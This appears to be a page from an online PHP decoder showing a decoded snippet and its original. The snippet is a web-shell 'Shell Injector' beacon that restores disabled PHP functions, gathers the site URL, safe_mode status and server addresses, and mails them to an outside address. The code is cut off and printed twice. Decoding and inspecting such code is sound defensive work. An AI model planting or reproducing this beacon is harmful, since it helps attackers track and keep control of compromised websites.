Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @ini_restore("disable_functions"); if (!isset($_SESSION['bajak'])) { $visitcount =..
Decoded Output download
<?php @ini_restore("disable_functions");
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Shell Injector
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
$security = "SAFE_MODE = OFF";
} else {
$security = "SAFE_MODE = ON";
};
$df = 'ini_get disable!';
$serper = gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body", "Shell Result http://$web$inj
$security
?>
Did this file decode correctly?
Original Code
<?php @ini_restore("disable_functions");
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Shell Injector
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
$security = "SAFE_MODE = OFF";
} else {
$security = "SAFE_MODE = ON";
};
$df = 'ini_get disable!';
$serper = gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body", "Shell Result http://$web$inj
$security
Function Calls
None |
Stats
MD5 | 8ea450b05c16bad92028b2fd57160f95 |
Eval Count | 0 |
Decode Time | 41 ms |